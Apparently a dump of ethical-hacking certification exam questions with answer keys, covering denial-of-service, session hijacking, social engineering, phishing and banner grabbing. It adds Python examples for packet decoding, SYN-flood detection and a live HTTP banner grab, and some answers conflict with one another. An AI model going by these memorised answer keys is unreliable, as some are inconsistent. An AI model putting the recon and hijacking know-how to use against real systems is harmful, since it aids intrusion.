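The port decoding of QUESTION 190 and the IDS fragment test of QUESTION 215 both start from the same IPv4 header fields, so here is one added Python example (not part of the exam material) that covers both: it turns a `tcpdump -x` style hexdump into bytes, extracts the TCP destination port and looks it up, and applies the rule "protocol 1, last fragment, (IP offset * 8) + (IP data length) > 65535" to ICMP fragments. The hexdump, IP addresses and the small trojan-port table are constructed for the example; the exam's own exhibit is not reproduced here.

```python
"""IPv4 header decoding for two of the questions above (added example).

- Q190: pull the TCP destination port out of a hexdump and look it up.
- Q215: apply the ping-of-death fragment test to ICMP packets.
All packets, addresses and the port table below are constructed.
"""
import struct

# Constructed lookup, standing in for the trojan-port databases the question mentions.
TROJAN_PORTS = {6667: "Net-Devil (shares the port with plain IRC)"}


def parse_hexdump(text):
    """Convert 'tcpdump -x' style lines ('0x0000:  4500 0028 ...') into raw bytes."""
    raw = []
    for line in text.strip().splitlines():
        _offset, _, hexpart = line.partition(":")
        raw.append(hexpart.replace(" ", ""))
    return bytes.fromhex("".join(raw))


def parse_ipv4(pkt):
    """Decode the IPv4 header fields that the two questions rely on."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (pkt[0] & 0x0F) * 4
    total_len, _ident, flags_frag = struct.unpack("!HHH", pkt[2:8])
    return {
        "ihl": ihl,
        "total_len": total_len,
        "more_fragments": bool(flags_frag & 0x2000),   # MF flag: clear on the last fragment
        "frag_offset": flags_frag & 0x1FFF,            # in 8-byte units
        "proto": pkt[9],                               # 1 = ICMP, 6 = TCP
        "payload": pkt[ihl:total_len],
    }


def tcp_ports(ip):
    """Source and destination port from the first four bytes of the TCP header."""
    if ip["proto"] != 6:
        raise ValueError("not TCP")
    return struct.unpack("!HH", ip["payload"][:4])


def identify_by_port(dport):
    return TROJAN_PORTS.get(dport, "unknown")


def is_ping_of_death_fragment(ip):
    """The IDS rule quoted in Q215: ICMP, last fragment, and
    (IP offset * 8) + (IP data length) > 65535, i.e. reassembly would exceed the limit."""
    data_len = ip["total_len"] - ip["ihl"]
    last_fragment = ip["frag_offset"] > 0 and not ip["more_fragments"]
    return ip["proto"] == 1 and last_fragment and ip["frag_offset"] * 8 + data_len > 65535


def build_ipv4(proto, flags_frag, payload):
    """Build a minimal IPv4 packet for the demo (checksum left zero; constructed data)."""
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 2, flags_frag,
                         64, proto, 0, bytes([192, 168, 0, 10]), bytes([198, 51, 100, 10]))
    return header + payload


# Q190-style capture: a TCP SYN from 192.168.0.10:1234 to 198.51.100.10 port 0x1A0B.
SAMPLE_HEXDUMP = """
0x0000:  4500 0028 0001 4000 4006 0000 c0a8 000a
0x0010:  c633 640a 04d2 1a0b 0000 0001 0000 0000
0x0020:  5002 2000 0000 0000
"""

# Q215-style fragments: offset 8189 * 8 = 65512, plus 400 data bytes = 65912 > 65535.
POD_LAST_FRAGMENT = build_ipv4(1, 0x1FFD, b"\x00" * 400)
# A normal last fragment: offset 16 * 8 = 128, plus 1480 data bytes = 1608.
BENIGN_LAST_FRAGMENT = build_ipv4(1, 0x0010, b"\x00" * 1480)


def decode_capture(hexdump):
    """Q190 workflow: hexdump -> IP header -> destination port -> database lookup."""
    ip = parse_ipv4(parse_hexdump(hexdump))
    sport, dport = tcp_ports(ip)
    return {"sport": sport, "dport": dport, "match": identify_by_port(dport)}


if __name__ == "__main__":
    print(decode_capture(SAMPLE_HEXDUMP))
    for name, frag in (("oversized", POD_LAST_FRAGMENT), ("benign", BENIGN_LAST_FRAGMENT)):
        print(name, is_ping_of_death_fragment(parse_ipv4(frag)))
```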
QUESTION 216:
Which one of the following network attacks takes advantages of weaknesses in the fragment reassembly functionality of the TCP/IP protocol stack?
A. Teardrop
B. Smurf
C. Ping of Death
D. SYN flood
E. SNMP Attack
Answer: A
Explanation:
The teardrop attack uses overlapping packet fragments to confuse a target system and cause the system to reboot or crash.
QUESTION 217:
A denial of Service (DoS) attack works on the following principle:
A. MS-DOS and PC-DOS operating systems utilize a weakness that can be compromised and permit them to launch an attack easily.
B. All CLIENT systems have a TCP/IP stack implementation weakness that can be compromised and permit them to launch an attack easily.
C. Overloaded buffer systems can easily address error conditions and respond appropriately.
D. Host systems cannot respond to real traffic, if they have an overwhelming number of incomplete connections (SYN/RCVD State).
E. A server stops accepting connections from certain networks once those networks become flooded.
Answer: D
Explanation: Denial-of-service (often abbreviated as DoS) is a class of attacks in which an attacker attempts to prevent legitimate users from accessing an Internet service, such as a web site. This can be done by exercising a software bug that causes the software running the service to fail (such as the "Ping of Death" attack against Windows NT systems), sending enough data to consume all available network bandwidth (as in the May, 2001 attacks against Gibson Research), or sending data in such a way as to consume a particular resource needed by the service.
QUESTION 218:
What happens during a SYN flood attack?
A. A target machine is flooded with TCP connection requests that use randomized source addresses & ports for the TCP ports.
B. A TCP SYN packet, which is a connection initiation, is sent to a target machine, giving the target host's address as both source and destination, and is using the same port on the target host as both source and destination.
C. A TCP packet is received with the FIN bit set but with no ACK bit set in the flags field.
D. A TCP packet is received with both the SYN and the FIN bits set in the flags field.
Answer: A
Explanation:
To a server that requires an exchange of a sequence of messages. The client system begins by sending a SYN message to the server. The server then acknowledges the SYN message by sending a SYN-ACK message to the client. The client then finishes establishing the connection by responding with an ACK message and then data can be exchanged. At the point where the server system has sent an acknowledgment (SYN-ACK) back to the client but has not yet received the ACK message, there is a half-open connection. A data structure describing all pending connections is in memory of the server that can be made to overflow by intentionally creating too many partially open connections. Another common attack is the SYN flood, in which a target machine is flooded with TCP connection requests. The source addresses and source TCP ports of the connection request packets are randomized; the purpose is to force the target host to maintain state information for many connections that will never be completed. SYN flood attacks are usually noticed because the target host (frequently an HTTP or SMTP server) becomes extremely slow, crashes, or hangs. It's also possible for the traffic returned from the target host to cause trouble on routers; because this return traffic goes to the randomized source addresses of the original packets, it lacks the locality properties of "real" IP traffic, and may overflow route caches. On Cisco routers, this problem often manifests itself in the router running out of memory.
QUESTION 219:
What is the term used to describe an attack that falsifies a broadcast ICMP echo request and includes a primary and secondary victim?
A. Fraggle Attack
B. Man in the Middle Attack
C. Trojan Horse Attack
D. Smurf Attack
E. Back Orifice Attack
Answer: D
Explanation:
Trojan and Back Orifice are Trojan horse attacks. Man in the middle spoofs the IP and redirects the victim's packets to the cracker. The infamous Smurf attack preys on ICMP's capability to send traffic to the broadcast address. Many hosts can listen and respond to a single ICMP echo request sent to a broadcast address.
Network Intrusion Detection third Edition by Stephen Northcutt and Judy Novak pg 70
The "smurf" attack's cousin is called "fraggle", which uses UDP echo packets in the same fashion as the ICMP echo packets; it was a simple re-write of "smurf".
QUESTION 220:
What is the goal of a Denial of Service Attack?
A. Capture files from a remote computer.
B. Render a network or computer incapable of providing normal service.
C. Exploit a weakness in the TCP stack.
D. Execute service at PS 1009.
Answer: B
Explanation: In computer security, a denial-of-service attack (DoS attack) is an attempt to make a computer resource unavailable to its intended users. Typically the targets are high-profile web servers, and the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer crime that violates the Internet proper use policy as indicated by the Internet Architecture Board (IAB).
QUESTION 221:
What do you call a system where users need to remember only one username and password, and be authenticated for multiple services?
A. Simple Sign-on
B. Unique Sign-on
C. Single Sign-on
D. Digital Certificate
Answer: C
Explanation: Single sign-on (SSO) is a specialized form of software authentication that enables a user to authenticate once and gain access to the resources of multiple software systems.
QUESTION 222:
Clive has been monitoring his IDS and sees that there are a huge number of ICMP Echo Reply packets that are being received on the external gateway interface. Further inspection reveals that they are not responses from the internal hosts' requests but simply responses coming from the Internet.
What could be the most likely cause?
A. Someone has spoofed Clive's IP address while doing a smurf attack.
B. Someone has spoofed Clive's IP address while doing a land attack.
C. Someone has spoofed Clive's IP address while doing a fraggle attack.
D. Someone has spoofed Clive's IP address while doing a DoS attack.
Answer: A
Explanation: The smurf attack, named after its exploit program, is a denial-of-service attack that uses spoofed broadcast ping messages to flood a target system. In such an attack, a perpetrator sends a large amount of ICMP echo (ping) traffic to IP broadcast addresses, all of it having a spoofed source address of the intended victim. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function, most hosts on that IP network will take the ICMP echo request and reply to it with an echo reply, multiplying the traffic by the number of hosts responding. On a multi-access broadcast network, hundreds of machines might reply to each packet.
QUESTION 223:
What would best be defined as a security test on services against a known vulnerability database using an automated tool?
A. A penetration test
B. A privacy review
C. A server audit
D. A vulnerability assessment
Answer: D
Explanation: Vulnerability assessment is the process of identifying and quantifying vulnerabilities in a system. The system being studied could be a physical facility like a nuclear power plant, a computer system, or a larger system (for example the communications infrastructure or water infrastructure of a region).
QUESTION 224:
A Buffer Overflow attack involves:
A. Using a trojan program to direct data traffic to the target host's memory stack
B. Flooding the target network buffers with data traffic to reduce the bandwidth available to legitimate users
C. Using a dictionary to crack password buffers by guessing user names and passwords
D. Poorly written software that allows an attacker to execute arbitrary code on a target system
Answer: D
Explanation:
B describes a denial of service, not a buffer overflow. A buffer overflow occurs when a program writes more data into a fixed-size buffer than it can hold, so the excess overwrites adjacent memory such as a saved return address on the stack. An attacker who controls that data can redirect execution into code of their choosing, which is why the defect is defined by the poorly written software rather than by the traffic used to trigger it.
QUESTION 225:
How does a denial-of-service attack work?
A. A hacker tries to decipher a password by using a system, which subsequently crashes the network
B. A hacker attempts to imitate a legitimate user by confusing a computer or even another person
C. A hacker prevents a legitimate user (or group of users) from accessing a service
D. A hacker uses every character, word, or letter he or she can think of to defeat authentication
Answer: C
Explanation: In computer security, a denial-of-service attack (DoS attack) is an attempt to make a computer resource unavailable to its intended users. Typically the targets are high-profile web servers, and the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer crime that violates the Internet proper use policy as indicated by the Internet Architecture Board (IAB).
QUESTION 226:
When working with Windows systems, what is the RID of the true administrator account?
A. 500
B. 501
C. 512
D. 1001
E. 1024
F. 1000
Answer: A
Explanation: The built-in administrator account always has a RID of 500.

QUESTION 227:
If you send a SYN to an open port, what is the correct response? (Choose all correct answers.)
A. SYN
B. ACK
C. FIN
D. PSH
Answer: A, B
Explanation: A SYN sent to an open port is answered with a segment carrying both the SYN and ACK flags (SYN/ACK); a closed port answers with RST. Sending a SYN, reading the reply and then tearing the attempt down with RST instead of completing the handshake is the basis of half-open (SYN) scanning.
QUESTION 228:
When working with Windows systems, what is the RID of the true administrator account?
A. 500
B. 501
C. 1000
D. 1001
E. 1024
F. 512
Answer: A
Explanation: Because of the way in which Windows functions, the true administrator account always has a RID of 500.
QUESTION 229:
You have been called to investigate a sudden increase in network traffic at Certkiller. It seems that the traffic generated was so heavy that normal business functions could no longer be rendered to external employees and clients. After a quick investigation, you find that the computer has services running attached to TFN2K and Trinoo software. What do you think was the most likely cause behind this sudden increase in traffic?
A. A distributed denial of service attack.
B. A network card that was jabbering.
C. A bad route on the firewall.
D. Invalid rules entry at the gateway.

Answer: A
Explanation: In computer security, a denial-of-service attack (DoS attack) is an attempt to make a computer resource unavailable to its intended users. Typically the targets are high-profile web servers, and the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer crime that violates the Internet proper use policy as indicated by the Internet Architecture Board (IAB).
TFN2K and Trinoo are tools used for conducting DDoS attacks: a handler controls many agent hosts, and finding their agent services running on the machine means it is a participant in a distributed flood, not a victim of a misconfiguration.
QUESTION 230:
SYN Flood is a DoS attack in which an attacker deliberately violates the three-way handshake and opens a large number of half-open TCP connections.
The signature for SYN Flood attack is:
A. The source and destination address having the same value.
B. The source and destination port numbers having the same value.
C. A large number of SYN packets appearing on a network without the corresponding reply packets.
D. A large number of SYN packets appearing on a network with the corresponding reply packets.
Answer: C
Explanation: A SYN flood exploits the buffer space reserved during TCP session initialization. The attacker floods the target's small queue of half-open ("in-process") connections with SYN requests, typically from spoofed source addresses, and never completes the handshake when the target replies with SYN/ACK. Each entry is held until it times out, so the backlog fills and the target can no longer accept legitimate connections. On the wire this shows up as a large number of SYNs that are never followed by the ACK that would complete the handshake.
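The signature the question describes can be checked from a segment log by tracking each handshake to completion. The following is an added example (not part of the exam dump) that keeps per-connection state from a list of constructed TCP segments and reports, per server, how many SYNs never reached the established state; the thresholds are assumptions for the demo.

```python
# Added example for Q230: track TCP handshakes from a segment log and report
# the SYN flood signature, SYNs that are never completed by the client's ACK.
# Not part of the exam dump; the segment records below are constructed.
from collections import defaultdict

# Constructed sample: (flags, src, dst, dst_port). "S" = SYN from the client,
# "SA" = SYN/ACK from the server, "A" = the client's final ACK.
SAMPLE_SEGMENTS = [
    ("S", "198.51.100.7", "203.0.113.80", 80),
    ("SA", "203.0.113.80", "198.51.100.7", 51000),
    ("A", "198.51.100.7", "203.0.113.80", 80),       # one genuine connection
] + [
    seg
    for i in range(20, 26)                            # six spoofed sources
    for seg in (
        ("S", f"192.0.2.{i}", "203.0.113.80", 80),
        ("SA", "203.0.113.80", f"192.0.2.{i}", 40000 + i),  # server answers, nobody is listening
    )
]


def handshake_states(segments):
    """Map (client, server, server_port) -> 'half_open' or 'established'."""
    states = {}
    for flags, src, dst, dport in segments:
        if flags == "S":
            states[(src, dst, dport)] = "half_open"
        elif flags == "A":
            key = (src, dst, dport)
            if states.get(key) == "half_open":
                states[key] = "established"
        # "SA" changes nothing: the server replied, but the entry stays half-open
        # until the client's ACK arrives, which in a flood it never does.
    return states


def syn_flood_report(segments, min_syns=5, max_half_open_ratio=0.5):
    """Per server: how many SYNs, how many completed, and whether it looks flooded.

    min_syns and max_half_open_ratio are demo thresholds; tune them to the
    connection rate the server normally sees.
    """
    per_server = defaultdict(lambda: {"syns": 0, "established": 0})
    for (_client, server, _port), state in handshake_states(segments).items():
        per_server[server]["syns"] += 1
        if state == "established":
            per_server[server]["established"] += 1
    for stats in per_server.values():
        half_open = stats["syns"] - stats["established"]
        stats["half_open"] = half_open
        stats["flooded"] = (
            stats["syns"] >= min_syns
            and half_open / stats["syns"] > max_half_open_ratio
        )
    return dict(per_server)


if __name__ == "__main__":
    print(syn_flood_report(SAMPLE_SEGMENTS))
```

Note that the server's SYN/ACKs are present in the log, so a flood is recognised by the missing third segment, not by the absence of any reply; with spoofed sources the SYN/ACKs simply go to hosts that never asked.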
QUESTION 231:
Henry is an attacker and wants to gain control of a system and use it to flood a target system with requests, so as to prevent legitimate users from gaining access.
What type of attack is Henry using?
A. Henry is executing commands or viewing data outside the intended target path
B. Henry is using a denial of service attack which is a valid threat used by an attacker
C. Henry is taking advantage of an incorrect configuration that leads to access with higher-than-expected privilege
D. Henry uses poorly designed input validation routines to create or alter commands to gain access to unintended data or execute commands
Answer: B

Explanation: Henry's intention is to perform a DoS attack against his target, possibly a DDoS attack. He uses systems other than his own to perform the attack in order to cover the tracks back to him and to get more "punch" in the DoS attack if he uses multiple systems.
QUESTION 232:
Eve decides to get her hands dirty and tries out a Denial of Service attack that is relatively new to her. This time she envisages using a different kind of method to attack Brownies Inc. Eve tries to forge the packets and uses the broadcast address.
She launches an attack similar to that of fraggle. What is the technique that Eve used in the case above?
A. Smurf
B. Bubonic
C. SYN Flood
D. Ping of Death
Answer: A
Explanation: A fraggle attack is a variation of the smurf attack for denial of service in which the attacker sends spoofed UDP packets (typically to the echo or chargen ports) instead of ICMP echo request (ping) packets to the broadcast address of a large network. Eve's forged packets to the broadcast address are the smurf technique itself.
QUESTION 233:
Peter is a Network Admin. He is concerned that his network is vulnerable to a smurf attack. What should Peter do to prevent a smurf attack?
Select the best answer.
A. He should disable unicast on all routers
B. Disable multicast on the router
C. Turn off fragmentation on his router
D. Make sure all anti-virus protection is updated on all systems
E. Make sure his router won't take a directed broadcast
Answer: E
Explanation:
Unicasts are one-to-one IP transmissions; disabling them would break most network traffic and still not prevent a smurf attack. Turning off multicast or fragmentation on the router has nothing to do with Peter's concern, since a smurf attack uses broadcast, not multicast, and does not rely on fragmentation. Anti-virus protection will not help either. A smurf attack is a flood of ICMP echo requests sent to a network's broadcast address with a spoofed source.
If directed broadcasts are forwarded by the router, every host on the destination network replies to the spoofed source, which is the real victim. Configuring the router not to forward directed broadcasts (on Cisco IOS the interface command no ip directed-broadcast, which has been the default since IOS 12.0) stops the network from acting as an amplifier.
QUESTION 234:
Your boss at Certkiller.com asks you what are the three stages of Reverse Social Engineering.
A. Sabotage, advertising, Assisting
B. Sabotage, Advertising, Covering
C. Sabotage, Assisting, Billing
D. Sabotage, Advertising, Covering
Answer: A
Explanation: Reverse social engineering runs in three stages: sabotage, where the attacker causes or fakes a problem for the victim; advertising, where the attacker makes sure the victim knows whom to call for help; and assisting, where the attacker "fixes" the problem and, in the process, obtains the credentials or information wanted. It works because of reciprocity: once someone has helped us, we feel obliged to return the favour, so the victim hands over what is asked for without suspicion.
QUESTION 235:
Why is Social Engineering considered attractive by hackers and also adopted by experts in the field?
A. It is done by well known hackers and in movies as well.
B. It does not require a computer in order to commit a crime.
C. It is easy and extremely effective to gain information.
D. It is not considered illegal.
Answer: C
Explanation: Social engineering is a collection of techniques used to manipulate people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery for information gathering or computer system access and in most (but not all) cases the attacker never comes face-to-face with the victim. The term has been popularized in recent years by well known (reformed) computer criminal and security consultant Kevin Mitnick, who points out that it's much easier to trick someone into giving you his or her password for a system than to spend the effort to hack in. He claims it to be the single most effective method in his arsenal.
QUESTION 236:
What is the most common vehicle for social engineering attacks?
A. Phone
B. Email
C. In person
D. P2P Networks
Answer: A
Explanation: Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone.
QUESTION 237:
Jack Hacker wants to break into Certkiller's computers and obtain their secret double fudge cookie recipe. Jack calls Jane, an accountant at Certkiller, pretending to be an administrator from Certkiller. Jack tells Jane that there has been a problem with some accounts and asks her to verify her password with him "just to double check our records". Jane does not suspect anything amiss, and parts with her password. Jack can now access Certkiller's computers with a valid user name and password, to steal the cookie recipe.
What kind of attack is being illustrated here? (Choose the best answer)
A. Reverse Psychology
B. Reverse Engineering
C. Social Engineering
D. Spoofing Identity
E. Faking Identity
Answer: C
Explanation: This is a typical case of pretexting. Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone.
QUESTION 238:
Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge cookie recipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co. Jack tells Jane that there has been a problem with some accounts and asks her to tell him her password 'just to double check our records'. Jane believes that Jack is really an administrator, and tells him her password. Jack now has a user name and password, and can access Brown Co.'s computers, to find the cookie recipe. This is an example of what kind of attack?
A. Reverse Psychology
B. Social Engineering
C. Reverse Engineering
D. Spoofing Identity
E. Faking Identity
Answer: B
Explanation: This is a typical case of pretexting. Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone.
QUESTION 239:
Usernames, passwords, e-mail addresses, and the location of CGI scripts may be obtained from which of the following information sources?
A. Company web site
B. Search engines
C. EDGAR Database query
D. Whois query
Answer: A
Explanation: A whois query returns registration and contact data for a domain, not the location of CGI scripts. The EDGAR database gives a lot of corporate information but again nothing about CGI scripts. A search engine can surface much of this if you have the time, but it is the company's own web site that directly exposes the scripts it uses (in links and form actions) along with staff names and e-mail addresses that can be turned into usernames.
QUESTION 240:
What are the six types of social engineering?(Choose six).
A. Spoofing
B. Reciprocation
C. Social Validation
D. Commitment
E. Friendship
F. Scarcity
G. Authority
H. Accountability
Answer: B, C, D, E, F, G
Explanation: All social engineering is performed by taking advantage of human nature. For in-depth information on the subject review, read Robert Cialdini's book, Influence: Science and Practice.

QUESTION 241:
What does the following command achieve?
telnet <target IP address> 80
HEAD / HTTP/1.0

A. This command returns the home page for the IP address specified
B. This command opens a backdoor Telnet session to the IP address specified
C. This command returns the banner of the website specified by IP address
D. This command allows a hacker to determine the sites security
E. This command is bogus and will accomplish nothing
Answer: C
Explanation: This command is used for banner grabbing. Banner grabbing helps identify the service and version of web server running.
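The telnet exchange above is simple to reproduce and to parse programmatically. The following is an added example (not part of the exam dump) that builds the same HEAD request, extracts the status line and Server header from the reply, and includes a live socket version of the grab. The reply it is exercised on is constructed so the example runs offline; the Apache and PHP version strings in it are invented for the demo.

```python
# Added example for Q241: build the HEAD request used for banner grabbing and
# parse the status line and Server header out of the reply. The live function
# opens a real socket; the parser is exercised on a constructed response so the
# example runs offline. Not part of the exam dump.
import socket


def build_head_request(host, path="/"):
    """HEAD asks for headers only, so the banner comes back without a body."""
    return f"HEAD {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def parse_banner(raw):
    """Return the status line and a lower-cased header dict from an HTTP reply."""
    head, _sep, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {
        "status": lines[0],
        "server": headers.get("server", "<not disclosed>"),
        "powered_by": headers.get("x-powered-by"),   # often leaks the app stack too
        "headers": headers,
    }


def grab_banner(host, port=80, timeout=5.0):
    """Live version of the telnet exchange in the question (needs network access)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_head_request(host))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return parse_banner(b"".join(chunks))


# Constructed reply, shaped like a typical Apache answer to the HEAD above.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 23 Feb 2009 10:00:00 GMT\r\n"
    b"Server: Apache/2.2.11 (Unix) PHP/5.2.8\r\n"
    b"X-Powered-By: PHP/5.2.8\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print(parse_banner(SAMPLE_RESPONSE))
```

A Server header can be suppressed or faked by the administrator, so treat the banner as a hint to be confirmed by other fingerprinting rather than as proof of the version in use.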
QUESTION 242:
Within the context of Computer Security, which of the following statements best describe Social Engineering?
A. Social Engineering is the act of publicly disclosing information.
B. Social Engineering is the act of getting needed information from a person rather than breaking into a system.
C. Social Engineering is the means put in place by human resource to perform time accounting.
D. Social Engineering is a training program within sociology studies.
Answer: B
Explanation: Social engineering is a collection of techniques used to manipulate people into performing actions or divulging confidential information.
QUESTION 243:
Bob waits near a secured door, holding a box. He waits until an employee walks up to the secured door and uses the special card in order to access the restricted area of the target company. Just as the employee opens the door, Bob walks up to the employee (still holding the box) and asks the employee to hold the door open so that he can enter. What is the best way to undermine the social engineering activity of tailgating?
A. Issue special cards to access secured doors at the company and provide a one-time only brief description of use of the special card
B. to post a sign that states "no tailgating" next to the special card reader adjacent to the secured door
C. setup a mock video camera next to the special card reader adjacent to the secured door
D. to educate all of the employees of the company on best security practices on a recurring basis
Answer: D
Explanation: Tailgating will not work in small companies where everyone knows everyone, and neither will it work in very large companies where everyone is required to swipe a card to pass, but it is a very simple and effective social engineering attack against mid-sized companies where it is common for one employee not to know everyone. There are two ways to stop this attack: either by buying expensive perimeter defences in the form of gates (mantraps or turnstiles) that let only one employee pass per card swipe, or by educating every employee on a recurring basis.
QUESTION 244:
Jake works as a system administrator at Acme Corp. Jason, an accountant of the firm befriends him at the canteen and tags along with him on the pretext of appraising him about potential tax benefits. Jason waits for Jake to swipe his access card and follows him through the open door into the secure systems area. How would you describe Jason's behavior within a security context?
A. Trailing
B. Tailgating
C. Swipe Gating
D. Smooth Talking
Answer: B
Explanation: Tailgating, in which an unauthorized person follows someone with a pass into an office, is a very simple social engineering attack. The intruder opens the door, which the authorized user walks through, and then engages them in conversation about the weather or weekend sport while they walk past the reception area together.
QUESTION 245:
Study the following e-mail message. When the link in the message is clicked, it will take you to an address like: http://hacker.xsecurity.com/in.htm. Note that hacker.xsecurity.com is not an official SuperShopper site!
What attack is depicted in the below e-mail?
Dear SuperShopper valued member,
Due to concerns, for the safety and integrity of the SuperShopper community we have issued this warning message. It has come to our attention that your account information needs to be updated due to inactive members, frauds and spoof reports.
If you could please take 5-10 minutes out of your online experience and renew your records you will not run into any future problems with the online service. However, failure to update your records will result to your account cancellation. This notification expires within 24 hours.
Once you have updated your account records your SuperShopper will not be interrupted and will continue as normal.
Please follow the link below and renew your account information.
https://www.supershopper.com/cgi-bin/webscr?cmd=update-run
SuperShopper Technical Support
http://www.supershopper.com
A. Phishing attack
B. E-mail spoofing
C. social engineering
D. Man in the middle attack
Answer: A
Explanation: Phishing is a criminal activity using social engineering techniques.
Phishers attempt to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication. Phishing is typically carried out using email or an instant message, although phone contact has been used as well.
QUESTION 246:
A majority of attacks come from insiders, people who have direct access to a company's computer system as part of their job function or a business relationship.
Who is considered an insider?
A. The CEO of the company because he has access to all of the computer systems
B. A government agency since they know the company computer system strengths and weaknesses
C. Disgruntled employee, customers, suppliers, vendors, business partners, contractors, temps, and consultants
D. A competitor to the company because they can directly benefit from the publicity generated by making such an attack
Answer: C
Explanation: An insider is anyone who already has a foot inside one way or another.
QUESTION 247:
Which type of hacker represents the highest risk to your network?
A. script kiddies
B. grey hat hackers
C. black hat hackers
D. disgruntled employees
Answer: D
Explanation: The disgruntled users have some permission on your database, versus a hacker who might not get into the database. Global Crossings is a good example of how a disgruntled employee -- who took the internal payroll database home on a hard drive -- caused big problems for the telecommunications company. The employee posted the names, Social Security numbers and birthdates of company employees on his Web site. He may have been one of the factors that helped put them out of business.
QUESTION 248:
Sabotage, Advertising and Covering are the three stages of _____
A. Social engineering
B. Reverse Social Engineering
C. Reverse Software Engineering
D. Rapid Development Engineering
Answer: B
Explanation: Typical social interaction dictates that if someone gives us something then it is only right for us to return the favour. This is known as reverse social engineering, when an attacker sets up a situation where the victim encounters a problem, they ask the attacker for help and once the problem is solved the victim then feels obliged to give the information requested by the attacker.
QUESTION 249:
Dave has been assigned to test the network security of Acme Corp. The test was announced to the employees. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. Visitors were allowed to click on a sand clock to mark the progress of the test. Dave successfully embeds a keylogger. He also added some statistics on the webpage. The firewall protects the network well and allows strict Internet access. How was security compromised and how did the firewall respond?
A. The attack did not fall through as the firewall blocked the traffic
B. The attack was social engineering and the firewall did not detect it
C. The attack was deception and security was not directly compromised
D. Security was not compromised as the webpage was hosted internally
Answer: B
Explanation: This was just another way to trick the information out of the users without the need to hack into any systems. All traffic is outgoing and initiated by the user so the firewall will not react.
QUESTION 250:
Which of these are phases of a reverse social engineering attack?
Select the best answers.
A. Sabotage
B. Assisting
C. Deceiving
D. Advertising
E. Manipulating
Answer: A, B, D
Explanations:
According to "Methods of Hacking: Social Engineering", by Rick Nelson, the three phases of reverse social engineering attacks are sabotage, advertising, and assisting.
QUESTION 251:
Bob is going to perform an active session hijack against Certkiller. He has acquired a target that allows session-oriented connections (Telnet) and performs sequence prediction on the target operating system. He manages to find an active session due to the high level of traffic on the network.
So, what is Bob most likely to do next?
A. Take over the session.
B. Reverse sequence prediction.
C. Guess the sequence numbers.
D. Take one of the parties' offline.
Answer: C
QUESTION 252:
John is using tokens for the purpose of strong authentication. He is not confident that his security is considerably strong.
In the context of session hijacking, why would you consider this a false sense of security?
A. The token based security cannot be easily defeated.
B. The connection can be taken over after authentication.
C. A token is not considered strong authentication.
D. Token security is not widely used in the industry.
Answer: B
Explanation: A token will give you a more secure authentication, but the tokens will not help against attacks that are directed against you after you have been authenticated.
QUESTION 253:
What is the key advantage of Session Hijacking?
A. It can be easily done and does not require sophisticated skills.
B. You can take advantage of an authenticated connection.
C. You can successfully predict the sequence number generation.
D. You cannot be traced in case the hijack is detected.
Answer: B
Explanation: As an attacker you don't have to steal an account and password in order to take advantage of an authenticated connection.
QUESTION 254:
What type of cookies can be generated while visiting different web sites on the
Internet?
A. Permanent and long term cookies.
B. Session and permanent cookies.
C. Session and external cookies.
D. Cookies are all the same, there is no such thing as different type of cookies.
Answer: B
Explanation: There are two types of cookies: a permanent cookie that remains on a visitor's computer for a given time, and a session cookie that is held only in the visitor's browser memory during the time the visitor is using the web site.
Session cookies disappear when you close your Web browser.
QUESTION 255:

Which is the right sequence of packets sent during the initial TCP three way handshake?
A. FIN, FIN-ACK, ACK
B. SYN, URG, ACK
C. SYN, ACK, SYN-ACK
D. SYN, SYN-ACK, ACK
Answer: D
Explanation:
A TCP connection always starts with a request for synchronization, a SYN. The reply is a segment with both SYN and ACK set, acknowledging that the SYN was received, and the last part of the three-way handshake is a plain ACK confirming that the SYN/ACK was received.
QUESTION 256:
What is Hunt used for?
A. Hunt is used to footprint networks
B. Hunt is used to sniff traffic
C. Hunt is used to hack web servers
D. Hunt is used to intercept traffic i.e. man-in-the-middle traffic
E. Hunt is used for password cracking
Answer: D
Explanation: Hunt can be used to intercept traffic. It is useful with telnet, ftp, and others to grab traffic between two computers or to hijack sessions.
QUESTION 257:
You want to carry out session hijacking on a remote server. The server and the client are communicating via TCP after a successful TCP three way handshake. The server has just received packet #120 from the client. The client has a receive window of 200 and the server has a receive window of 250.
Within what range of sequence numbers should a packet, sent by the client fall in order to be accepted by the server?
A. 200-250
B. 121-371
C. 120-321
D. 121-231
E. 120-370

Answer: B
Explanation: Packet number 120 has already been received by the server, and the server's receive window is 250, so the exam's answer counts from 121 (the next expected number) up to 371 (121 + 250). Two caveats for practice: TCP sequence numbers count bytes, not packets, and the window per RFC 793 runs from RCV.NXT through RCV.NXT + RCV.WND - 1, which for these figures is 121 through 370; the exam key treats the upper bound inclusively. Either way, the relevant window is the receiver's (the server's 250), not the client's 200.
